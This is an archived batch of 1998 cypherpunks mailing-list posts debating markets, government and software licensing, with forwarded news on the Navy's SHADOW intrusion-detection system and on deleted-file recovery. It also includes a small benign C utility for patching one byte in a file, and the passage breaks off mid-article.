> > The Mafia has had two primary characteristics:
> > 
> > a) the use of force
> 
> wouldn't this characteristic define the mafia as a "state" to some
> degree?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 9 Oct 1998 18:25:02 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Another potential flaw in current economic theory... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A35@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> > free markets don't work, and lead inevitably to monopoly,
> > and therefore we ought to use governments monopolies on 
> force to prevent
> 
> Where do I *ever* say we need 'government' monopolies. Not 
> once, not ever.

No, I believe he said (meant) government's monopoly on force (i.e.
regulation, not anarchism), not government monopolies.

> I have said, and stand by it now, that what is needed is an 
> *impartial* 3rd party. That does *NOT* equate to 'the 
> government'.

Wow, I happen to agree, people need on objective framework in which to
take their disputes. The only such framework though that need be a
monopoly is one that deals with force as the dispute or where force is
the end retribution (i.e. you cannot have regulatory arbitrage with
force). The problem is the assumption that any such regulator could be
impartial. The need for such arbiter needs to be minimized (hence
minimal/limited government = laissez faire != anarcho-capitalism).

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce@inbox.nytimes.com (New York Times subscription robot)
Date: Fri, 9 Oct 1998 15:53:33 +0800
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199810090806.DAA146876@inbox.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome cypher11,

Thank you for registering for The New York Times on the Web!

Your ID is cypher11
You selected your password at registration.
Your e-mail address is cypherpunks@toad.com

The Times on the Web brings you the authority and integrity of The
New York Times, with the immediacy, utility and depth of the Internet.
You'll find the daily contents of The Times, along with news updates every
10 minutes from the Associated Press and throughout the day from 
New York Times editors.

You'll also find reports and features exclusive to the Web in our
Technology and Books areas. You can explore a 365-day archive 
of The New York Times for free, and download articles at a small charge.

The site also features:

== Up-to-the-minute sports scores and statistics
== Breaking market news and custom stock portfolios
== Current weather conditions and five-day forecasts 
for more than 1,500 cities worldwide
== A free, searchable library of more than 50,000 New York Times 
book reviews
== A searchable database of help wanted listings
== The crossword puzzle, bridge and chess columns, available 
by subscription

Thanks again for registering. Please visit us again soon at
http://www.nytimes.com

Sincerely,
Rich Meislin
Editor in Chief
The New York Times Electronic Media company

*****************************************

Please do not reply to this message.  If you did not authorize 
this registration, someone has mistakenly registered using your 
e-mail address.  We regret the inconvenience; please see
http://www.nytimes.com/subscribe/help/cancel.html for instructions.

For more information about The New York Times on the Web
and your registration, please visit the Help Center at:
http://www.nytimes.com/subscribe/help/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@ecn.org>
Date: Fri, 9 Oct 1998 12:47:20 +0800
To: cypherpunks@toad.com
Subject: readme.txt
Message-ID: <199810090445.GAA16013@www.ecn.org>
MIME-Version: 1.0
Content-Type: text/plain



lets not sit here breeding hatred amongst ourselves over
software licenses, for god's sake. we have more important things
to do. we need to try and implement more different --kinds-- of
crypto applications, like tim says in a recent post. we have to 
work together on this, not spread hard feelings amongst our little
group. (really i think the number of people who can write this kind
of code and who understand the political part is miniscule.)
coopration is key. fucking smash the state.

In a closed-door manuever, controversial "roving wiretap"
provisions have been added to a major Intelligence authorization
bill and passed by the House. Current wiretapping law allows
tapping of a particular person's phones. The new provisions would
dramatically expand current authority by allowing taps on any
phone used by, or "proximate" to, the person being tapped -- no
matter whose phone it is. 

http://www.cdt.org/legislation/calea/roving.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Oct 1998 20:41:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Navy's Open Source Security Project Shines
Message-ID: <v04011705b243aac779c0@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Thu, 08 Oct 1998 23:28:13 -0400
From: Richard Sampson <rjsa@sprintmail.com>
Organization: Unknown Organization
MIME-Version: 1.0
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>
Subject: IP: Navy's Open Source Security Project Shines
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: Richard Sampson <rjsa@sprintmail.com>

Navy's Open Source Security Project Shines
Oct 08, 1998 (Tech Web - CMP via COMTEX) -- An open source security
program created by a team of Navy programmers is proving to be one of
the most successful high-tech network burglar alarms online.

Late last month, the Navy released an unusual warning -- attackers were
probing military computers in ways that had previously gone unnoticed,
coordinating efforts around the world to keep any individual series of
probes virtually invisible.

Analysts had finally noticed the potential crackers' coordinated probes
using the Navy's SHADOW, or Secondary Heuristic Analysis System for
Defensive Online Warfare, intrusion-detection program.

"It was partly dumb luck," said Stephen Northcutt, the Navy's lead
analyst and programmer on the SHADOW team. But the software's
sensitivity to subtle attacks, combined with the number-crunching power
of statisticians associated with the project, let Northcutt and his
team of analysts tease evidence of the probes out of a mass of
apparently innocuous network logs, he said.

The SHADOW software is one of a growing number of intrusion-detection
tools on the market, designed to pick up and help analyze attempts to
break into computer networks instead of simply functioning as a passive
firewall-style siege wall.

Most of the major commercial-security vendors, such as Axent, Internet
Security Systems, or Network Associates, all provide
intrusion-detection programs, with support and service teams that can
help analyze possible attacks.

SHADOW is different in this respect. It is freely distributed online.
Like most open source programs, there is some documentation, but no
official support -- although there is a huge community of programmers
who have looked at the code and have written improvements and continue
to tinker with the way it functions.

The software itself is the product of more than two years of work by a
team led by Northcutt. The code was initially released to the public
last May, and revised later in the summer after a slew of comments and
criticism from outside developers.

It consists of two parts. Sensors sit outside a network firewall,
monitoring normal and potentially illicit attempts to enter the
network. An analysis system sits inside the firewall keeping a log of
activity, and periodically putting this information in front of a human
security analyst.

In the months since its release, the program has been picked up and
used by several major financial institutions, universities, local
government systems, and divisions of large companies that don't have
budgets for commercial intrusion-detection programs, Northcutt said.

"It's very good at doing some things and not so good at others," said
Allen Paller, chief researcher at the SANS Institute, a
network-security research and education organization. The program can
be initially difficult to use, since it requires users to program their
own filters to recognize attacks or probes not included in the original
documentation.

But the program's open source birth and evolution has made it strong
and extremely sensitive, Paller said. "The real strength of this
process is [the program] has been beaten on."

Northcutt is a proponent of pushing the open source model even beyond
the development of code, at least in the security field.

Most intrusion-detection programs function by picking up unusual events
-- malformed TCP or domain name system queries, handshakes between
servers and clients that don't look quite right, or other signs of
computer probes and attacks. SHADOW and other commercial trip-wire
programs do a good job of picking up things they recognize, Northcutt
and other security analysts said. But new attacks -- such as the
coordinated probes spotlighted by the Navy last month -- require
considerable expert analysis to spot.

"Attackers have been sharing very well inside their community," we have
no equivalent to the underground magazines and other communication
channels." -- Stephen Northcutt U.S. Navy That's where the open source
model comes in, Northcutt said. Intrusion-detection analysts can
function best if information about different attacks is widely and
freely distributed. The Navy site that distributes SHADOW publishes
much of the information it uncovers, and distributes new filters that
recognize new attacks and probes. This kind of open, widely shared
information is critical for stopping crackers, but must happen on a
wide scale, he said.

"Attackers have been sharing very well inside their community,"
Northcutt said. "We have no equivalent to the underground magazines and
other communication channels."

Paller agreed. His organization is one of several that sponsor
workshops where security professionals can share their experiences with
their peers. SANS also runs a security-oriented mailing list with
nearly 55,000 subscribers, many of whom served as SHADOW reviewers.

"Unless we get communication lines going, we can't keep up," Paller
said. "Otherwise, we don't have a chance."

-0-

Copyright (C) 1998 CMP Media Inc.


News provided by COMTEX.
[!HIGHTECH] [!INFOTECH] [COMMUNITY] [COMPUTER] [EDUCATION] [GOVERNMENT]
[INTERNET] [MARKET] [MILITARY] [NAVY] [NEWS] [NEWSGRID] [ONLINE]
[RESEARCH] [SOFTWARE] [TWB]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Coverett" <blake@wizards.com>
Date: Sat, 10 Oct 1998 01:06:21 +0800
To: <rms@gnu.org>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
Message-ID: <004801bdf3a1$f168e6b0$b401010a@is_blake.wizards.com>
MIME-Version: 1.0
Content-Type: text/plain



>This might seem like a paradox: you give people "more freedom", but
>they end up with less.  How can that be?  It has to do with stretching
>the word "freedom" to include the ability to control other people.
>That kind of "freedom" tends to leave other people with less freedom.
>What happened with the X Window System illustrates this unambiguously
>(see http://www.gnu.org/philosophy/x.html).


This assumes that writing and selling proprietary software is 'the ability
to
control other people'.  I fail to see why this would be the case.  Free
software
is a good thing, but people *choose* to accept the restrictions of non-free
software for any number of reasons.  I do not see anyone being coerced into
using it by threat of physical force.

regards,
-Blake (who prefers markets to religions, even with software)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Werner Koch <wk@isil.d.shuttle.de>
Date: Fri, 9 Oct 1998 16:38:38 +0800
To: rick@campbellcentral.org
Subject: Re: propose: `cypherpunks license'
In-Reply-To: <199810071026.GAA20270@germs.dyn.ml.org>
Message-ID: <19981009100220.E11573@isil.d.shuttle.de>
MIME-Version: 1.0
Content-Type: text/plain



Richard Stallman <rms@gnu.org> writes:

> This might seem like a paradox: you give people "more freedom", but
> they end up with less.  How can that be?  It has to do with stretching
> the word "freedom" to include the ability to control other people.
> That kind of "freedom" tends to leave other people with less freedom.

   "Die Freiheit des Einzelnen endet dort,
    wo sie die Freiheit der Anderen einschrnkt."
                                      Rosa Luxemburg

   The freedom of an individual ends, as it (the freedom)
   limits the freedom of the others.


[This was one of the former Eastern Germany liberty movements' slogans
 -  and not a communists one]


  Werner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Fri, 9 Oct 1998 17:42:37 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <199810081951.OAA20049@einstein.ssz.com>
Message-ID: <19981009101640.A29055@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Oct 08, 1998 at 02:51:56PM -0500, Jim Choate wrote:

> Then freedom is incompatible with human psychology. People are social
> animals and will build social institutions (ie government), it's in their
> genes.

government is a special form of social institution, one which has a self
declared monopoly on force and is immoral.

> The point is to create a market with 'fair competition', something that
> won't occur naturaly because of a variety of reasons. 

'fair competition' is any competition that doesn't involve political
force or breaking contracts.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    the steady state of disks is full.
        -- ken thompson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Fri, 9 Oct 1998 17:49:09 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: Re: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A193A7A31@mossbay.chaffeyhomes.com>
Message-ID: <19981009102419.B29483@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Oct 08, 1998 at 04:14:32PM -0700, Matthew James Gering wrote:
> 
> The Mafia has had two primary characteristics:
> 
> a) the use of force

wouldn't this characteristic define the mafia as a "state" to some
degree?

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

the capacity of human beings to bore one another seems to be vastly
greater than that of any other animals.  some of their most esteemed
inventions have no other apparent purpose, for example, the dinner
party of more than two, the epic poem, and the science of metaphysics.  -- h. l.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 9 Oct 1998 17:01:17 +0800
To: cypherpunks@toad.com
Subject: Re: Post from Anonymous
In-Reply-To: <199810082030.WAA12450@replay.com>
Message-ID: <361DD830.42711623@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> The article goes on to state that the French secret service, DGSE, has
> established listening posts in the Dordogne (Southern France) and also in
> its overseas territories, including French Guiana and New Caledonia. The
> article attributes to an unnamed "senior official within this branch of the
> French secret service" the claim, "This is the game of the secret war,"
> adding that U.S. listening posts do the same. The magazine report says
> Germans who bought into the French Helios 1A spy satellite system are being
> given access to political and economic secrets as part of a Franco-German
> agreement to compete with a commercial information agreement between the
> United States and Britain.

There is an Asian proverb saying that all crows of the world are
black.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 10 Oct 1998 02:18:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Something else...
Message-ID: <361E4D81.2076@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>> I think freedom comes from order and knowing what to do with that
>> freedom comes from chaos. 
>
> Freedom comes from understanding what one can do standing alone,
> naked, in the middle of a wilderness. Everything else is a
> compromise of that.

I was thinking more along the lines of : an animal that has literal
freedom spends 99.9% of its time looking for food and avoiding
predators. The order we impose upon our lives by being social animals
give us a more satisfying type of freedom that is derived from leisure. 

What I see as the real problem is that as the degree of order is
increased the society becomes more like an anthill. Which I consider the
perfect example of a bioengineered police state. Kind of what corporate
America would like all of us citizens to be - predictable controllable
unquestioning undeviating uncreative underthethumb consumer units. A key
means to this end is eliminating cash and privacy. It's no here yet but
it's in process. I don't think it's a conspiratorial effort either -
it's more the result of widespread bad behavior. I'm rather stunned at
the blatant disregard our representatives display for the basic
liberties the moment these liberties seem inconvenient.

Mike

Don't trust your HW or your SW. There are soldier ant footprints
everywhere.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 9 Oct 1998 17:39:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: The Cypherpunks Agenda
Message-ID: <199810090921.LAA12288@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The reason for the people getting upset and saying shut up and write is the
fact that very few people are mentioning anything about the code.  The
politics discussed are sometimes reasons why we need more code but
unfortunately usually don't give you an idea of what to write.  Personally I
have sat down many times to my keyboard with a disk of code in one hand and
just stared blankly at the screen until giving up and reading the list with
a notebook in hand for any ideas.

I do believe in keeping the political content,  however you can see the
difference betwwen pointless dabate on clinton and debating on what project
should we devote our time to and what causes are we fighting for and how
many bananas a camel can carry.   This message isn't to stifle the ointless
debate it is to spur neww projects,   How do we combine our vast pool of
knowledge to actually produce results?

One funny thing though,  some people filter out anonymous messages that come
from the list,  what does that say about us believing in our own methods.  

- ---- Crey,  What a world I would live in if I really had a say. 

>So where is the _rest_ of the code?
>
>"Cypherpunks write code" is a mantra to shut up any discussion of which
>building blocks are important to write. And yet most of the mantra chanters
>are actually not writing useful or interesting code, just hacking away in
>their cubicles....
>
>Sad.
>
>
>--Tim May
>
>Y2K: A good chance to reformat America's hard drive and empty the trash.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
> 
-----BEGIN PGP SIGNATURE-----
Version: PGP Cyber-Knights Templar build 5.5.3ckt
Comment: KeyID: 0xF4D1901B
Comment: Fingerprint: DB49 2BFA 856F 0B7E  CB78 9C3E 0167 279D

iQEVAwUBNh3RUqKPqmf00ZAbAQEePAf9G/cDeeQRYtgMqcbSn+4LjqPgPYIsxARR
XMutCe6w84p86tQH4KlZMJDjdiYge6Mz+uC/s4C3K16nfJU2n/Ha+ZjOoAzhRg/1
HuZHxEElBt5Wl7FdzYWtT/OGTalYu1NAkOCEq5fKt20gHtGsSgmyVvdyLSLtGEte
Ni13807ETgbhH36TT9zusE4lenFEZ9PM+cslapdOzxRx2rJOuEMh1nowcufQ89mE
CWDI7mjPBdseKFUXGSPbvC1+FfeLQjFpQUjyp7ggs5AsbXElXOJUJ2VCFeOboGBI
5OK3yDzw04TjgEN7UnzatqebbSO9llu23sbuvs0Ng3/mpgZWeR9jIg==
=B+l0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 10 Oct 1998 01:25:42 +0800
To: Steve Dunlop <cypherpunks@cyberpass.net
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
In-Reply-To: <361BF3ED.8111C033@bitstream.net>
Message-ID: <19981009130500.A18749@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Oct 07, 1998 at 06:06:21PM -0500, Steve Dunlop wrote:

| The white paper on the MSDN web site says it uses
| DESX (no explaination as to what the X is) and an
| RSA public key algorithm to store the symmetric keys,
| which are random for each file.
| 
| So what's DESX?

DESX is where you xor the output of a des block with the key.  Has
some interesting properties which McCurley? showed in Crypto 97
proceedings.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 10 Oct 1998 02:39:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Something else... (fwd)
Message-ID: <199810091820.NAA24888@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 09 Oct 1998 10:53:05 -0700
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Something else...

> >> I think freedom comes from order and knowing what to do with that
> >> freedom comes from chaos. 
> >
> > Freedom comes from understanding what one can do standing alone,
> > naked, in the middle of a wilderness. Everything else is a
> > compromise of that.
> 
> I was thinking more along the lines of : an animal that has literal
> freedom spends 99.9% of its time looking for food and avoiding
> predators. The order we impose upon our lives by being social animals
> give us a more satisfying type of freedom that is derived from leisure. 

Actualy most animals spend 60% or more asleep, only about 10% looking for
food (there are exceptions here for the smaller herbivores because of
scaling issues related to metabolism). The current estimate is that, for
example humans, in the wild spend only about 8 hours out of 40 is spent
looking for food.

> What I see as the real problem is that as the degree of order is
> increased the society becomes more like an anthill.

I agree, but I think it's a function of the form of government and not the
institution of government itself. A large part of it, which I've stated many
times, is that the vast majority of systems that people develop assume the
people are plug-n-play. That's a major shortcoming in  my mind. I believe
democracy has a chance to subvert that shortcoming but only if the
participants aren't primarily motivated by compromise, a base human
expression.

> Which I consider the
> perfect example of a bioengineered police state.

I'll agree biology has a lot to do with it if it's not recognized for the
shortcoming it is.

> Kind of what corporate
> America would like all of us citizens to be - predictable controllable
> unquestioning undeviating uncreative underthethumb consumer units.

The 'rational consumer' axiom in traditional economics is a perfect example
of how this becomes entrenched (even when it isn't accurate). That's sort of
the problem with government in that they want these absolute limits on
behaviour, yet so few behaviours are absolutely good or bad. Law sucks when
it deals with exceptions. Another aspect of failure in our current system is
that the law and its practitioners aren't unbiased, they have a vested in
interest in the outcome, not the principles.

> it's in process I don't think it's a conspiratorial effort either -
> it's more the result of widespread bad behavior. I'm rather stunned at
> the blatant disregard our representatives display for the basic
> liberties the moment these liberties seem inconvenient.

Your preaching to the choir...

One aspect that seems under appreciated is that as the population grows the
number of people who hold a particular view grow. Since their behaviours are
influenced by those views it begins to be expressed as a social movement
(perhaps not in the traditional view ala yippies for example) and even a
political one. The collective results of all these little actions can in
fact behave in a manner that is quite 'conpiracy' like.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Connectfree Admins" <support@connectfree.net>
Date: Fri, 9 Oct 1998 21:26:47 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <0111b58341209a8WEB@www.telinco.net>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Sat, 10 Oct 1998 02:40:47 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810071026.GAA20270@germs.dyn.ml.org>
Message-ID: <361E522D.1082C33C@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard Stallman wrote:

> Public domain gives person P the ability to make modified versions and
> give users no freedom in using them.  The result is that people in
> general have less freedom.

Untrue.  Person P may make proprietary versions of the program, however,
the program's users may simply chose to not use them and instead take
the original public domain program, write their own modifications as needed
and do what they will with them.  In fact, they may even develop a function
clone of Person P's program and put it back in the Public Domain if they
so chose.  

How does this restrict anyone?  Oh, they can't code you say?  Well, too bad,
if they want to use other people's code, let them learn.  If one choses to
learn to code, one frees himself.

Nobody is forcing those users to use Person P's code any more than
anyone is being forced to use Windoze 98.

Cypherpunks Write Code is something I believe in, and practice.   For
example, someone today needed to modify several bytes in a binary file
that got corrupted in transit.  Not having any sort of hex editor he asked
if I knew what I could use.  I told him to try gdb or adb and such, but
he wasn't able to, so I wrote the bit of code following this message.

Now, I could make this trivial bit of code proprietary and charge money for
it, but others could simply spend some time and write their own.  I could
make it GPL, and thus let everyone use it, but nobody would be able to
copy this code and incorporate it in their code if they didn't want to 
make their code GPL'ed.  So instead, I am making this available as
public domain.  Do what you like with it.  Hell, if you'd like go ahead
and modify it and GPL it, do so, but that won't stop anyone wishing to make
commercial versions of it from finding this original bit of code rather
than the GPL.  Nor will it stop anyone who just wants to use the code.

So what's the point?  As long as public domain software exists and can
be tracked down and use, it frees everyone.  GPL on the other hand does
not.  Sure, it frees the users, but limits the authors.

Of course the GPL has one advantage that you forgot to mention (or that
I haven't noticed.)  Should Microsoft decide to grab Linux and produce
Microsoft Linux (with or without the GNU utilities) they'd have to
produce their sources.

 --- twiddler.c ----->8 cut here 8<-------------------------------------



#include <stdio.h>
#include <errno.h>

int main(int argc, char *argv[])
{
 FILE *myfile;
 long loc;
 unsigned char val[2];
 char *endptr;

 if (argc!=4)
   {
    printf("%s filename address value\n all values preceded by 0x are hex,\n \
 0 are octal, else decimal.\n address is 32 bit, value is 8 bit\n",argv[0]);
    exit(0);
   }

 errno=0;
 myfile=fopen(argv[1],"rb+");

 if (!myfile || errno) {fprintf(stderr,"Unable to open file:%s\n",argv[1]);
exit(1);}
 loc=strtol(argv[2],&endptr,0);
 val[0]=(unsigned char) strtol(argv[3],&endptr,0);

 fprintf(stderr,"write %d to file %s at %ld\n",val[0],argv[1],loc);

 fseek(myfile,loc,0); if (errno) {fprintf(stderr,"Unable to seek to %ld in file
%s\n",loc,argv[1]); exit(2);}
 fwrite(val,1,1,myfile); if (errno) {fprintf(stderr,"Unable to write %d to file
%s at %ld\n",val[0],argv[1],loc); exit(3);}
 fflush(myfile); if (errno) {fprintf(stderr,"Unable to flush file\n");
exit(4);}
 fclose(myfile); if (errno) {fprintf(stderr,"Got error on closing file\n");
exit(5);}

 return 0;
}




-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: associate@alpineforest.com
Date: Sat, 10 Oct 1998 06:42:25 +0800
To: cypherpunks-unedited@toad.com
Subject: Associate Program
Message-ID: <76C492I2.19NC4W74@alpineforest.com>
MIME-Version: 1.0
Content-Type: text/plain




Thanksgiving is right around the corner! Pretty soon, it'll be Christmas! Are you looking for increasing your income for this busy shopping season? 

By spending only 3 minutes to sign-up for our Associate Program, you will start making risk-free income from your website. We will create an Associate Store page with a unique URL specifically for you. All you need to do is add links from your current website to your Store page, and then receive a 20% commission on all sales generated through your site every month. It is absolutely FREE for you to join this program. 

Click http://www.alpineforest.com/associate.html
to learn more about this exciting opportunity!

Thank you,

Michelle Schumer
Associate Program Coordinator,
http://www.alpineforest.com
===========================================================================
Click Here for Insider Tips and Secrets for Promoting your Business Online
http://www.marketingtips.com/t.cgi/3582/
===========================================================================


P.S. If you would prefer not to receive future e-mail from Alpineforest.com, please reply with the subject "remove" and you will be automatically removed from our mailing list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 10 Oct 1998 09:35:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.29: What's on Your Hard Drive That The Delete Didn't Delete?
Message-ID: <199810100115.SAA09632@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.29: What's on Your Hard Drive That The Delete Didn't Delete?
Date: Fri, 9 Oct 1998 00:40:03 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.29: What's on Your Hard Drive That The Delete Didn't Delete?
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday October 9, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The New York Times, October 8, 1998
http://www.nytimes.com

What's on Your Hard Drive?
If You Want Privacy, It Pays to Find Out What Data Your Computer Saves And
How to Erase Information That the Delete Button Hardly Touches
http://search.nytimes.com/search/daily/bin/fastweb?getdoc+site+iib-site+52+
0+wAAA+privacy


By
PETER H. LEWIS

For computer users, some of the more startling revelations in the Starr
report have nothing to do with sex.

Footnotes in the report from the Office of the Independent Counsel include
such phrases as "document recovered from Ms. Lewinsky's home computer,"
"e-mail retrieved from Catherine Davis's computer" and "deleted file from
Ms. Lewinsky's home computer."

One of the ways Kenneth W. Starr's investigators peered into the private
lives of their subjects was to peer into their computers. What they were
able to find, and the ease with which they found it, may prompt computer
users to re-evaluate their computer practices.

Word processing software, Web browsing software and electronic mail have
become integral to all sorts of communications, both professional and
personal. As a result, many people have files on their hard disks that they
wish to keep private, like love letters, confidential business documents or
financial data.

And many people have sensitive, confidential and potentially embarrassing
files in their computers that they do not know are there, either because
they think that the files have been erased or because they are unaware that
certain common programs on the computer automatically keep a log of what
the user does.

"Recovering files that were deleted from a computer directory is a trivial
process," said Joel R. Reidenberg, a professor at the Fordham University
School of Law in New York who specializes in privacy issues. He said a
related issue was the computer's creation of sensitive files that the user
often did not know were there in the first place.

"The user's Web browser will create files, unbeknownst to the user, that
record all their interactions," Professor Reidenberg said. "Many people
today know about cookie files, but the browser creates a history file as
well that keeps a record of the Web sites the user visits. And then there's
a cache file that sometimes even keeps copies of the pictures that have
been downloaded."

More obscure are the temporary files created by word processors, for
example, and the so-called swap files that an operating system creates as a
way to manage computer memory. These files often remain readable even if
the original files are erased.

In computers, being safe can sometimes lead to being sorry, as Oliver L.
North discovered in the Iran-contra investigation in the Reagan
Administration, when incriminating files he thought had been deleted were
later resurrected from network backup tapes. In the current Justice
Department investigation of the Microsoft Corporation, e-mail messages and
memorandums from long ago are being resurrected from computer disks and
cited as crucial evidence.

The great majority of computer users have little reason to believe that
their computer files will be scrutinized by law-enforcement agents,
corporate and government spies, or even special investigators. But what
about unscrupulous co-workers or curious children or computer thieves? What
confidential information resides on the hard disk of the computer that was
donated to charity, sold at a yard sale or accidentally left on the
commuter train?

Examples abound of sensitive information going out the door when government
agencies, pharmacies, doctors' offices and other businesses donate or sell
used computers without erasing the computers' memories.

Last year, for example, a woman in Nevada bought a used computer from an
Internet auction company and was surprised to find that it contained names,
addresses, Social Security numbers and prescription information for 2,000
people, including people being treated for AIDS, alcoholism and mental
illnesses. A pharmacy had failed to erase the information when it sold the
computer.

The rise in the number of computer thefts and the increased sharing of
computers in the home are confronting consumers with security issues that
in the past were issues only for big corporations, banks, the military and
government agencies, said Steve Solomon, chief executive of Citadel
Technology Inc., a security software company in Dallas whose products
include Winshield and Folderbolt. "It's moving down into the small office
and home office markets, to schools and to home computer users," he said.

How does one keep confidential information private? And when the
information is no longer needed, how does one make sure that it is
completely erased? Both questions involve a combination of good computer
security policies and good security software.

The software is the easy part. Creating and sticking with good security
habits is the hard part.

"Technology exists today to protect individual privacy for as long as the
individual chooses to keep the information private," said Scott Schnell,
senior vice president of marketing at RSA Data Security of San Mateo,
Calif.

Computer users today have access to inexpensive software tools that can
encrypt the contents of a file (including images), an e-mail message or
even the entire contents of a computer so thoroughly that it can never be
read by someone else in our lifetimes. Other programs can shred unwanted
files so completely that no one can recover them. But very few people use
such security tools.

Computers are good at keeping secrets. Too good, in fact. The secrets can
